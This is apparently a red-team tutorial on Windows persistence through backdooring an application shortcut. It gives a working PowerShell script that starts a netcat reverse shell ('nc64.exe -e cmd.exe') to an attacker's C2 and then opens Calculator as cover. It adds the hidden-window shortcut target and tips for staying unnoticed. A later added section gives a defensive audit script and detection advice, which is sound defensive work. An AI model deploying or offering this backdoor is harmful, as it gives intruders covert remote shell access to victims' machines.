Windows Persistence: Setting Back Door Application

Every app on your Windows system points to an executable file that is responsible for running the application. You can see which file a shortcut points to by right-clicking it, choosing Properties, and opening the Shortcut tab: the path of the executable is in the Target field. If our permissions are right we can change the target to point to a reverse shell, a bind shell listening on a port, a PowerShell script, or whatever clever backdoor we can think of. Every time a user clicks the application icon the backdoor will be triggered.

We'll want to choose an app that users interact with a lot, but there is a trade-off between stealth and the likelihood that a user will click our backdoor. If we choose something that's used too frequently we'll make a lot of noise and a good analyst will know to check the path to which the executable points. Do we want to make a connection to our C2 every time someone wants to use Edge to Google something? Probably not.

The Calculator app, however, is a better candidate than Edge or Outlook for a backdoor. It is used often enough by normal users, but not so often that it spawns a reverse shell every 15 minutes. When modifying the shortcut target it is important that whatever backdoor script we use also launches the original app. Stealth is paramount: our backdoor cannot cause the app to crash, or the user will call the tech support team. Even if they don't discover the backdoor, they could wipe it out by reinstalling the app or fixing the shortcut.

Many of the built-in Windows utilities, calc.exe included, live in the C:\Windows\System32\ folder, which is roughly the equivalent of /bin on Linux systems (note that writing to it requires administrator rights). We'll store our backdoor PowerShell script badguy.ps1 there:

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe MY_IP MY_PORT"
C:\Windows\System32\calc.exe

The script is relatively simple. In the first line we trigger Netcat to connect to our C2 at a port of our choosing with a cmd.exe shell; we'll have to open a listener of some sort on our front-line C2 servers. We don't necessarily have to use Netcat; we could generate a Meterpreter payload or similar and trigger that, but it might raise anti-virus alerts. Using Netcat or other tools already on the system lets us live off the land. In the next line, we spawn the calculator to avoid arousing any suspicion. Highly effective, and very simple.

When modifying the shortcut to trigger the backdoor we'll need to make sure that running the script doesn't open any new windows, so we'll use the -WindowStyle hidden option. We can open the properties of our calculator shortcut and change the target to look something like this:

powershell.exe -WindowStyle hidden C:\Windows\System32\badguy.ps1

When we modify the target the app icon will change, but we can revert it to the normal icon by simply clicking the Change Icon button and selecting the default icon. Voila!
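From the defender's side, everything the technique above relies on is visible in the shortcut file itself: the target becomes a script host rather than the app, the arguments hide the window or name a script, and the icon is borrowed from a different executable. The following audit script is an added example, not code from the original post; it uses the WScript.Shell COM object to read each .lnk file and flags the patterns this page describes. The set of shortcut folders and the regular expressions for script hosts and suspicious arguments are assumptions you should extend for your environment.

```powershell
# Added example (not from the original post): audit shortcut targets for the
# backdooring pattern described above. Run from an elevated PowerShell prompt.
$shell = New-Object -ComObject WScript.Shell

# Folders where user-facing shortcuts normally live (assumed set; extend as needed)
$roots = @(
    "$env:PUBLIC\Desktop",
    "$env:USERPROFILE\Desktop",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
)

# Script hosts that a legitimate app shortcut almost never points at directly (assumed list)
$scriptHosts = 'powershell\.exe|pwsh\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe'
# Arguments that hide the window or load a script file (assumed list)
$suspiciousArgs = '-WindowStyle\s+hidden|-w\s+hidden|-EncodedCommand|-enc\b|\.ps1|\.vbs|\.js\b|\.bat'

$findings = foreach ($root in $roots) {
    if (-not (Test-Path $root)) { continue }
    Get-ChildItem -Path $root -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk       = $shell.CreateShortcut($_.FullName)
        $target    = $lnk.TargetPath
        $arguments = $lnk.Arguments
        $reasons   = @()

        if ($target -match $scriptHosts)        { $reasons += 'target is a script host' }
        if ($arguments -match $suspiciousArgs)  { $reasons += 'hidden window or script argument' }

        # IconLocation is "path,index"; an icon taken from one binary while the
        # target is a script host is the "Change Icon" trick from the post.
        $iconFile = ($lnk.IconLocation -split ',')[0]
        if ($iconFile -and $target -and ($iconFile -ne $target) -and ($target -match $scriptHosts)) {
            $reasons += 'icon borrowed from a different executable'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Shortcut = $_.FullName
                Target   = $target
                Args     = $arguments
                Icon     = $iconFile
                Modified = $_.LastWriteTime
                Reasons  = ($reasons -join '; ')
            }
        }
    }
}

$findings | Sort-Object Modified -Descending | Format-Table -AutoSize

# Second check: PowerShell scripts staged inside System32, where the post drops
# badguy.ps1. Legitimate .ps1 files there are rare, so review every hit.
Get-ChildItem "$env:SystemRoot\System32" -Filter *.ps1 -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime, Length
```

The LastWriteTime column is worth sorting on: a shortcut that was modified long after the app was installed is the first one to inspect. At runtime the same technique shows up as a process-creation event where explorer.exe is the parent of powershell.exe with a hidden-window argument, which in turn spawns both a network-capable binary and the real application, so the shortcut audit pairs naturally with a parent/child process rule in Sysmon or your EDR.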